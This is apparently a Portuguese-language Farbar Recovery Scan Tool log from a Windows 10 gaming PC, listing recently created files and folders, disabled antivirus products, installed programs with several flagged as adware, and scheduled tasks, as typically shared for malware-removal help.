Soul.lnk 2016-01-27 12:53 - 2016-01-27 12:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NCSOFT 2016-01-27 12:04 - 2016-02-11 10:24 - 00004174 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{5F6AB27D-71A6-440A-90D6-915E7E844D0F} 2016-01-27 11:31 - 2016-01-27 02:33 - 00048456 _____ (StdLib) C:\WINDOWS\system32\Drivers\{10593385-12ca-4697-8245-47ada7c055d9}Gw64.sys 2016-01-27 11:27 - 2016-01-27 11:27 - 00000000 ____D C:\Users\Todos os Usuários\16157 2016-01-27 11:27 - 2016-01-27 11:27 - 00000000 ____D C:\Users\Todos os Usuários\12205 2016-01-27 11:27 - 2016-01-27 11:27 - 00000000 ____D C:\ProgramData\16157 2016-01-27 11:27 - 2016-01-27 11:27 - 00000000 ____D C:\ProgramData\12205 2016-01-27 11:26 - 2016-01-27 11:26 - 00000000 ____D C:\Users\Todos os Usuários\12957 2016-01-27 11:26 - 2016-01-27 11:26 - 00000000 ____D C:\ProgramData\12957 2016-01-27 11:25 - 2016-01-27 11:25 - 00000000 ____D C:\Users\Todos os Usuários\01393 2016-01-27 11:25 - 2016-01-27 11:25 - 00000000 ____D C:\ProgramData\01393 2016-01-27 11:20 - 2016-01-27 11:21 - 31510703 _____ C:\Users\Maollo\Downloads\20759651_46be44de5bcd01ef075c79a1628c0596594e10c1.cab 2016-01-27 11:07 - 2016-01-27 11:07 - 00000000 ____D C:\Users\Todos os Usuários\12915 2016-01-27 11:07 - 2016-01-27 11:07 - 00000000 ____D C:\ProgramData\12915 2016-01-27 11:06 - 2016-01-27 11:06 - 00000000 ____D C:\Users\Todos os Usuários\31505 2016-01-27 11:06 - 2016-01-27 11:06 - 00000000 ____D C:\Users\Todos os Usuários\17620 2016-01-27 11:06 - 2016-01-27 11:06 - 00000000 ____D C:\ProgramData\31505 2016-01-27 11:06 - 2016-01-27 11:06 - 00000000 ____D C:\ProgramData\17620 2016-01-27 11:05 - 2016-01-27 11:05 - 00000000 ____D C:\Users\Todos os Usuários\24646 2016-01-27 11:05 - 2016-01-27 11:05 - 00000000 ____D C:\ProgramData\24646 2016-01-27 10:59 - 2016-01-27 10:59 - 00000000 ____D C:\Program Files\Realtek 2016-01-27 10:51 - 2016-01-27 10:56 - 148781560 _____ (Lenovo Group Limited ) 
C:\Users\Maollo\Downloads\h4as09ww.exe 2016-01-23 12:32 - 2016-01-23 12:32 - 00000000 ____D C:\Users\Todos os Usuários\01510 2016-01-23 12:32 - 2016-01-23 12:32 - 00000000 ____D C:\ProgramData\01510 2016-01-23 10:07 - 2016-01-23 10:07 - 00000000 ____D C:\Users\Todos os Usuários\18381 2016-01-23 10:07 - 2016-01-23 10:07 - 00000000 ____D C:\ProgramData\18381 2016-01-22 19:39 - 2016-01-22 19:39 - 00000020 ___SH C:\Users\DefaultAppPool\ntuser.ini 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 _SHDL C:\Users\DefaultAppPool\Modelos 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 _SHDL C:\Users\DefaultAppPool\Meus Documentos 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 _SHDL C:\Users\DefaultAppPool\Menu Iniciar 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Minhas Músicas 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Minhas Imagens 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 _SHDL C:\Users\DefaultAppPool\Documents\Meus Vídeos 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 _SHDL C:\Users\DefaultAppPool\Dados de Aplicativos 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 _SHDL C:\Users\DefaultAppPool\Configurações Locais 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 _SHDL C:\Users\DefaultAppPool\AppData\Roaming\Microsoft\Windows\Start Menu\Programas 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 _SHDL C:\Users\DefaultAppPool\AppData\Local\Histórico 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 _SHDL C:\Users\DefaultAppPool\AppData\Local\Dados de Aplicativos 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 _SHDL C:\Users\DefaultAppPool\Ambiente de Rede 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 _SHDL C:\Users\DefaultAppPool\Ambiente de Impressão 2016-01-22 19:39 - 2016-01-22 19:39 - 00000000 ____D C:\Users\DefaultAppPool 2016-01-22 19:39 - 2016-01-06 14:28 - 00000000 ____D C:\Users\DefaultAppPool\AppData\Roaming\Media Center Programs 2016-01-22 19:36 - 2016-01-22 19:36 - 00000000 ____D 
C:\Users\Maollo\AppData\Roaming\Awesomium 2016-01-22 19:35 - 2016-01-22 19:35 - 00000000 ____D C:\Users\Maollo\Documents\BnS 2016-01-21 23:05 - 2016-01-27 12:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NCWest 2016-01-21 23:05 - 2016-01-27 12:52 - 00000000 ____D C:\Program Files (x86)\NCWest 2016-01-21 22:50 - 2016-01-21 22:58 - 225000432 _____ (NC Interactive, LLC ) C:\Users\Maollo\Downloads\BnS_Lite_Installer.exe 2016-01-21 17:11 - 2016-01-21 17:11 - 00000000 ____D C:\Users\Maollo\AppData\Local\MicrosoftEdge 2016-01-21 17:08 - 2016-01-21 17:08 - 00042180 _____ C:\Users\Maollo\Desktop\23797668300001503643380250170059859700633330.pdf 2016-01-20 13:04 - 2016-01-20 13:04 - 00000000 ____D C:\Users\Public\Documents\Tools 2016-01-20 12:22 - 2016-02-10 12:22 - 00000314 _____ C:\WINDOWS\Tasks\{2A75E130-E0AE-40d1-B479-E583A0419691}.job 2016-01-20 12:22 - 2016-01-20 12:22 - 00003340 _____ C:\WINDOWS\System32\Tasks\{2A75E130-E0AE-40d1-B479-E583A0419691} 2016-01-20 12:22 - 2016-01-20 12:22 - 00000000 ____D C:\Users\Todos os Usuários\25382 2016-01-20 12:22 - 2016-01-20 12:22 - 00000000 ____D C:\ProgramData\25382 2016-01-20 11:39 - 2016-01-20 11:39 - 00000000 ____D C:\Users\Todos os Usuários\121f8832-4d95-0 2016-01-20 11:39 - 2016-01-20 11:39 - 00000000 ____D C:\ProgramData\121f8832-4d95-0 2016-01-20 11:33 - 2016-01-20 11:33 - 00023248 _____ C:\WINDOWS\System32\Tasks\{0E7F0E47-790E-0908-0F11-0C790E0E110E} 2016-01-20 11:33 - 2016-01-20 11:33 - 00000000 ____D C:\Users\Todos os Usuários\TempMoudleSet 2016-01-20 11:33 - 2016-01-20 11:33 - 00000000 ____D C:\Users\Todos os Usuários\121f8832-3091-1 2016-01-20 11:33 - 2016-01-20 11:33 - 00000000 ____D C:\ProgramData\TempMoudleSet 2016-01-20 11:33 - 2016-01-20 11:33 - 00000000 ____D C:\ProgramData\121f8832-3091-1 2016-01-20 11:32 - 2016-01-23 10:06 - 00000000 ____D C:\Program Files (x86)\updateservice 2016-01-20 11:32 - 2016-01-20 11:32 - 00000000 ____D C:\Users\Todos os Usuários\29918 2016-01-20 11:32 - 
2016-01-20 11:32 - 00000000 ____D C:\ProgramData\29918 2016-01-19 15:14 - 2016-01-19 15:14 - 00000000 ____D C:\Users\Todos os Usuários\09450 2016-01-19 15:14 - 2016-01-19 15:14 - 00000000 ____D C:\ProgramData\09450 2016-01-18 21:33 - 2016-01-18 21:33 - 00000000 ____D C:\Users\Todos os Usuários\28321 2016-01-18 21:33 - 2016-01-18 21:33 - 00000000 ____D C:\Users\Todos os Usuários\20187 2016-01-18 21:33 - 2016-01-18 21:33 - 00000000 ____D C:\Users\Todos os Usuários\13390 2016-01-18 21:33 - 2016-01-18 21:33 - 00000000 ____D C:\ProgramData\28321 2016-01-18 21:33 - 2016-01-18 21:33 - 00000000 ____D C:\ProgramData\20187 2016-01-18 21:33 - 2016-01-18 21:33 - 00000000 ____D C:\ProgramData\13390 2016-01-18 21:32 - 2016-01-18 21:33 - 00000000 ____D C:\Users\Todos os Usuários\00781 2016-01-18 21:32 - 2016-01-18 21:33 - 00000000 ____D C:\ProgramData\00781 2016-01-18 21:21 - 2016-01-18 21:21 - 00000000 ____D C:\Users\Todos os Usuários\08831 2016-01-18 21:21 - 2016-01-18 21:21 - 00000000 ____D C:\ProgramData\08831 2016-01-18 20:35 - 2016-01-18 20:35 - 00003712 _____ C:\WINDOWS\System32\Tasks\PFExe 2016-01-18 20:34 - 2016-01-18 21:20 - 00000000 ____D C:\Program Files\WajaNetEn 2016-01-18 20:31 - 2016-02-11 10:24 - 05892175 _____ (MediaDownloader ) C:\Users\Public\Documents\MediaDownloader.exe 2016-01-18 20:29 - 2016-01-18 20:28 - 00060136 _____ (DotC United Inc) C:\WINDOWS\system32\Drivers\MPCKpt.sys 2016-01-18 20:26 - 2016-01-18 20:26 - 00000000 ____D C:\Users\Todos os Usuários\00862 2016-01-18 20:26 - 2016-01-18 20:26 - 00000000 ____D C:\ProgramData\00862 2016-01-17 23:55 - 2016-02-11 10:20 - 00000000 ____D C:\Users\Todos os Usuários\WindowsMsg 2016-01-17 23:55 - 2016-02-11 10:20 - 00000000 ____D C:\ProgramData\WindowsMsg 2016-01-17 23:54 - 2016-01-17 23:55 - 00000000 ____D C:\Users\Todos os Usuários\17491 2016-01-17 23:54 - 2016-01-17 23:55 - 00000000 ____D C:\ProgramData\17491 2016-01-17 23:54 - 2016-01-17 23:54 - 00000000 ____D C:\Users\Todos os Usuários\26378 2016-01-17 
23:54 - 2016-01-17 23:54 - 00000000 ____D C:\Users\Todos os Usuários\12493 2016-01-17 23:54 - 2016-01-17 23:54 - 00000000 ____D C:\ProgramData\26378 2016-01-17 23:54 - 2016-01-17 23:54 - 00000000 ____D C:\ProgramData\12493 2016-01-17 23:53 - 2016-01-17 23:54 - 00000000 ____D C:\Users\Todos os Usuários\28992 2016-01-17 23:53 - 2016-01-17 23:54 - 00000000 ____D C:\ProgramData\28992 2016-01-16 21:25 - 2016-01-16 21:25 - 00000000 ____D C:\WINDOWS\system32\SleepStudy 2016-01-16 14:27 - 2016-01-16 14:27 - 00000000 ____D C:\Users\Todos os Usuários\28532 2016-01-16 14:27 - 2016-01-16 14:27 - 00000000 ____D C:\ProgramData\28532 2016-01-16 14:26 - 2016-01-16 14:26 - 00000000 ____D C:\Users\Todos os Usuários\03606 2016-01-16 14:26 - 2016-01-16 14:26 - 00000000 ____D C:\ProgramData\03606 2016-01-16 14:25 - 2016-01-16 14:26 - 00000000 ____D C:\Users\Todos os Usuários\31376 2016-01-16 14:25 - 2016-01-16 14:26 - 00000000 ____D C:\ProgramData\31376 2016-01-16 14:24 - 2016-01-16 14:25 - 00000000 ____D C:\Users\Todos os Usuários\16383 2016-01-16 14:24 - 2016-01-16 14:25 - 00000000 ____D C:\ProgramData\16383 2016-01-16 14:22 - 2016-01-16 14:28 - 00000000 ____D C:\Users\Todos os Usuários\32066 2016-01-16 14:22 - 2016-01-16 14:28 - 00000000 ____D C:\ProgramData\32066 2016-01-16 14:22 - 2016-01-16 14:22 - 00000000 ____D C:\Users\Todos os Usuários\04526 2016-01-16 14:22 - 2016-01-16 14:22 - 00000000 ____D C:\ProgramData\04526 2016-01-16 14:21 - 2016-01-16 16:13 - 00000000 ____D C:\Users\Todos os Usuários\09754 2016-01-16 14:21 - 2016-01-16 16:13 - 00000000 ____D C:\ProgramData\09754 2016-01-16 14:21 - 2016-01-16 14:21 - 00000000 ____D C:\Users\Todos os Usuários\07140 2016-01-16 14:21 - 2016-01-16 14:21 - 00000000 ____D C:\ProgramData\07140 2016-01-16 13:21 - 2016-01-05 00:51 - 01317640 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi 2016-01-16 13:21 - 2016-01-05 00:51 - 01141496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe 2016-01-16 13:21 - 2016-01-05 
00:50 - 00671472 _____ (Microsoft Corporation) C:\WINDOWS\system32\advapi32.dll 2016-01-16 13:21 - 2016-01-05 00:48 - 00499432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\advapi32.dll 2016-01-16 13:21 - 2016-01-05 00:45 - 02587696 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll 2016-01-16 13:21 - 2016-01-05 00:42 - 02026736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll 2016-01-16 13:21 - 2016-01-05 00:37 - 02544256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll 2016-01-16 13:21 - 2016-01-05 00:37 - 01299504 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetsrc.dll 2016-01-16 13:21 - 2016-01-05 00:37 - 00858952 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll 2016-01-16 13:21 - 2016-01-05 00:37 - 00245840 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll 2016-01-16 13:21 - 2016-01-05 00:37 - 00234504 _____ (Microsoft Corporation) C:\WINDOWS\system32\mftranscode.dll 2016-01-16 13:21 - 2016-01-05 00:36 - 00808800 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe 2016-01-16 13:21 - 2016-01-05 00:33 - 02180128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll 2016-01-16 13:21 - 2016-01-05 00:33 - 01118208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll 2016-01-16 13:21 - 2016-01-05 00:33 - 00701384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll 2016-01-16 13:21 - 2016-01-05 00:33 - 00208176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mftranscode.dll 2016-01-16 13:21 - 2016-01-05 00:33 - 00116728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfps.dll 2016-01-16 13:21 - 2016-01-05 00:31 - 00703840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe 2016-01-16 13:21 - 2016-01-05 00:27 - 01594408 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll 2016-01-16 13:21 - 2016-01-05 00:24 - 00796352 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll 2016-01-16 13:21 - 2016-01-05 00:23 - 01804664 _____ 
(Microsoft Corporation) C:\WINDOWS\system32\WMALFXGFXDSP.dll 2016-01-16 13:21 - 2016-01-05 00:23 - 01309376 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll 2016-01-16 13:21 - 2016-01-05 00:23 - 00786696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMADMOD.DLL 2016-01-16 13:21 - 2016-01-05 00:23 - 00119320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MP3DMOD.DLL 2016-01-16 13:21 - 2016-01-05 00:21 - 01371792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll 2016-01-16 13:21 - 2016-01-05 00:17 - 00695752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMADMOD.DLL 2016-01-16 13:21 - 2016-01-05 00:16 - 00100160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MP3DMOD.DLL 2016-01-16 13:21 - 2016-01-04 23:57 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgrcli.dll 2016-01-16 13:21 - 2016-01-04 23:56 - 00145920 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe 2016-01-16 13:21 - 2016-01-04 23:54 - 00162816 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe 2016-01-16 13:21 - 2016-01-04 23:50 - 00644096 _____ (Microsoft Corporation) C:\WINDOWS\system32\uReFS.dll 2016-01-16 13:21 - 2016-01-04 23:50 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll 2016-01-16 13:21 - 2016-01-04 23:49 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMSPDMOE.DLL 2016-01-16 13:21 - 2016-01-04 23:49 - 00749056 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneService.dll 2016-01-16 13:21 - 2016-01-04 23:49 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProximityCommon.dll 2016-01-16 13:21 - 2016-01-04 23:48 - 01009152 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMSPDMOD.DLL 2016-01-16 13:21 - 2016-01-04 23:48 - 00387072 _____ (Microsoft Corporation) C:\WINDOWS\system32\qdvd.dll 2016-01-16 13:21 - 2016-01-04 23:47 - 00628736 _____ (Microsoft Corporation) C:\WINDOWS\system32\MessagingDataModel2.dll 2016-01-16 13:21 - 2016-01-04 23:47 - 00479232 
_____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll 2016-01-16 13:21 - 2016-01-04 23:45 - 00678912 _____ (Microsoft Corporation) C:\WINDOWS\system32\qedit.dll 2016-01-16 13:21 - 2016-01-04 23:45 - 00275968 _____ (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll 2016-01-16 13:21 - 2016-01-04 23:43 - 00912384 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgr.dll 2016-01-16 13:21 - 2016-01-04 23:43 - 00584704 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe 2016-01-16 13:21 - 2016-01-04 23:41 - 00558592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\uReFS.dll 2016-01-16 13:21 - 2016-01-04 23:40 - 00890880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMSPDMOD.DLL 2016-01-16 13:21 - 2016-01-04 23:39 - 03428864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll 2016-01-16 13:21 - 2016-01-04 23:39 - 00569856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\qdvd.dll 2016-01-16 13:21 - 2016-01-04 23:39 - 00498176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MessagingDataModel2.dll 2016-01-16 13:21 - 2016-01-04 23:38 - 00389120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll 2016-01-16 13:21 - 2016-01-04 23:36 - 00573440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\qedit.dll 2016-01-16 13:21 - 2016-01-04 23:30 - 02796032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll 2016-01-16 13:20 - 2016-01-04 23:57 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\system32\RMSRoamingSecurity.dll 2016-01-16 13:20 - 2016-01-04 23:53 - 00148992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wshom.ocx 2016-01-16 13:20 - 2016-01-04 23:52 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll 2016-01-16 13:20 - 2016-01-04

Document format: text/plain

Resultado do exame Adicional Farbar Recovery Scan Tool (x64) Versão:07-02-2016
Executado por Maollo (2016-02-11 11:31:08)
Executando a partir de C:\Users\Maollo\Downloads
Windows 10 Pro (X64) (2016-01-06 16:42:47)
Modo da Inicialização: Normal
==========================================================


==================== Contas: =============================

Administrador (S-1-5-21-2840682155-2406404488-1448223199-500 - Administrator - Disabled)
Convidado (S-1-5-21-2840682155-2406404488-1448223199-501 - Limited - Disabled)
DefaultAccount (S-1-5-21-2840682155-2406404488-1448223199-503 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2840682155-2406404488-1448223199-1002 - Limited - Enabled)
Maollo (S-1-5-21-2840682155-2406404488-1448223199-1001 - Administrator - Enabled) => C:\Users\Maollo

==================== Central de Segurança ========================

(Se uma entrada for incluída na fixlist, será removida.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: 360 Total Security (Disabled - Up to date) {2B66EE1E-E5C8-C2F7-648F-4E55AC68D37D}
AS: 360 Total Security (Disabled - Up to date) {90070FFA-C3F2-CD79-5E3F-7527D7EF99C0}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Programas Instalados ======================

(Somente os programas adwares com a indicação "Oculto" podem ser adicionados à fixlist para desocultá-los. Os programas adwares devem ser desinstalados manualmente.)

µTorrent (HKU\S-1-5-21-2840682155-2406404488-1448223199-1001\...\uTorrent) (Version: 3.4.5.41372 - BitTorrent Inc.)
360 Total Security (HKLM-x32\...\360TotalSecurity) (Version: 8.0.0.1072 - 360 Security Center)
Adobe Flash Player 18 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 18.0.0.232 - Adobe Systems Incorporated)
Advanced Calendar 2.0.0.11189 (HKLM\...\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}) (Version: 2.0.0.11189 - MEIXIAN XIE) <==== ATENÇÃO
Atualizações da NVIDIA 2.5.14.5 (Version: 2.5.14.5 - NVIDIA Corporation) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Blade & Soul (HKLM-x32\...\InstallShield_{C3F383C1-D050-4A40-843F-8171A6A02C3A}) (Version: 1.0.63.237 - NC Interactive, LLC)
Blade & Soul (x32 Version: 1.0.63.237 - NC Interactive, LLC) Hidden
BlueStacks App Player (HKLM-x32\...\{D7E3588F-25E6-4A93-8B1C-596F7951CA38}) (Version: 0.10.7.5601 - BlueStack Systems, Inc.)
Combat Arms (HKLM-x32\...\Combat Arms) (Version: - )
Diablo III (HKLM-x32\...\Diablo III) (Version: - Blizzard Entertainment)
Diablo III Public Test (HKLM-x32\...\Diablo III Public Test) (Version: - Blizzard Entertainment)
Gameo (HKU\.DEFAULT\...\Gameo) (Version: 0.14.1 - IronSource Ltd.) <==== ATENÇÃO
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
HP Deskjet 2050 J510 series Ajuda (HKLM-x32\...\{7A3DF2E2-CF13-44FB-A93E-F71D5381DB3F}) (Version: 140.0.61.61 - Hewlett Packard)
HP Deskjet 2050 J510 series Estudo de aprimoramento de produtos (HKLM\...\{8D71EFB0-B1EF-4478-92D2-A65DB23AC460}) (Version: 28.0.1313.0 - Hewlett-Packard Co.)
HP Deskjet 2050 J510 series Software básico do dispositivo (HKLM\...\{2DCBB45E-AA03-4089-87E7-EC17E606D738}) (Version: 28.0.1313.0 - Hewlett-Packard Co.)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.7702 - HP)
HP Support Solutions Framework (HKLM-x32\...\{CAF5FFBA-8F3B-409C-9126-74DF66A036DF}) (Version: 12.0.30.81 - Hewlett-Packard Company)
HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden
Intel Android Device USB driver (HKLM\...\Intel Android Device USB driver) (Version: 1.1.5 - Intel)
Java 8 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218071F0}) (Version: 8.0.710.15 - Oracle Corporation)
Jogos Level Up (HKU\S-1-5-21-2840682155-2406404488-1448223199-1001\...\6d7bdf9c3c2a31f9) (Version: 0.9.4.29 - Level Up)
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games)
League of Legends (x32 Version: 3.0.1 - Riot Games) Hidden
Lightshot-5.3.0.0 (HKLM-x32\...\{30A5B3C9-2084-4063-A32A-628A98DE512B}_is1) (Version: 5.3.0.0 - Skillbrains)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
NCSOFT Game Launcher (HKLM-x32\...\NCLauncher_NCWest) (Version: - NCSOFT)
NVIDIA Driver de controle do 3D Vision 340.50 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 340.50 - NVIDIA Corporation)
NVIDIA Driver de gráficos 341.81 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 341.81 - NVIDIA Corporation)
NVIDIA Driver do 3D Vision 341.81 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 341.81 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.5.14.5 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.5.14.5 - NVIDIA Corporation)
NVIDIA Software do sistema PhysX 9.13.1220 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.1220 - NVIDIA Corporation)
osu! (HKLM-x32\...\{054ad7f6-7bcc-4e1c-aabe-bc4257b7f2a8}) (Version: latest - ppy Pty Ltd)
Overwolf (HKLM-x32\...\Overwolf) (Version: 0.92.3.0 - Overwolf Ltd.)
Overwolf.Setup.VC100CRTx64.Dist (HKLM\...\{EC9D5554-6852-4A55-81BB-AC02C7A8CFED}) (Version: 1.0.0 - Overwolf)
Overwolf.Setup.VC100CRTx86.Dist (x32 Version: 1.0.0 - Overwolf) Hidden
Painel de controle da NVIDIA 341.92 (Version: 341.92 - NVIDIA Corporation) Hidden
Platform (x32 Version: 1.34 - VIA Technologies, Inc.) Hidden
PriceFountain (remove only) (HKU\.DEFAULT\...\PriceFountain) (Version: 1.2.8.0 - JMLVPNWAROPHE) <==== ATENÇÃO
Primary Color (HKLM\...\Primary Color) (Version: 2016.02.05.191508 - Primary Color) <==== ATENÇÃO
Professional Cleaning Software (HKLM-x32\...\Professional Cleaning Software) (Version: 3.0.7 - Professional Cleaning Software)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.61.612.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6909 - Realtek Semiconductor Corp.)
Revo Uninstaller Pro 3.1.5 (HKLM\...\{67579783-0FB7-4F7B-B881-E5BE47C9DBE0}_is1) (Version: 3.1.5 - VS Revo Group, Ltd.)
RinoReader (HKLM-x32\...\RinoReader) (Version: 0.1 - RinoReader) <==== ATENÇÃO
Setup (HKLM-x32\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version: - ) <==== ATENÇÃO
SHIELD Streaming (Version: 4.1.3000 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.5.14.5 - NVIDIA Corporation) Hidden
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.5.0.9082 - Microsoft Corporation)
Skype™ 7.18 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.18.109 - Skype Technologies S.A.)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.18 - TeamSpeak Systems GmbH)
Update for PriceFountain (HKU\.DEFAULT\...\Price Fountain) (Version: - Update for PriceFountain) <==== ATENÇÃO
VIA Gerenciador de dispositivo de plataforma (HKLM-x32\...\InstallShield_{20D4A895-748C-4D88-871C-FDB1695B0169}) (Version: 1.34 - VIA Technologies, Inc.)
WarThunder (HKU\.DEFAULT\...\WarThunder) (Version: - WarThunder) <==== ATENÇÃO
WinRAR 5.21 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)

==================== Exame Personalizado CLSID (Whitelisted): ==========================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

CustomCLSID: HKU\S-1-5-21-2840682155-2406404488-1448223199-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Maollo\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\FileCoAuth.exe (Microsoft Corporation)

==================== Tarefas Agendadas (Whitelisted) =============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

Task: {04ED6BE3-5DB4-4804-B37B-D63DB90CEFC0} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-10-20] (Adobe Systems Incorporated)
Task: {0D77B420-CBA4-49BB-B38A-C4B8F636E03F} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {1937248A-0B5C-49E4-84BA-8898388647DD} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {2BF1ECE6-31DD-4F1E-B9CD-06058E8C0250} - System32\Tasks\{A9A02F16-AF76-40C9-A1E9-A93FD502B229} => pcalua.exe -a "C:\Program Files (x86)\MPC Cleaner\Uninstall.exe" -d "C:\Program Files (x86)\MPC Cleaner"
Task: {32EAEC5F-0B72-4FE6-8A43-D7F4F03372F3} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe [2014-11-28] ()
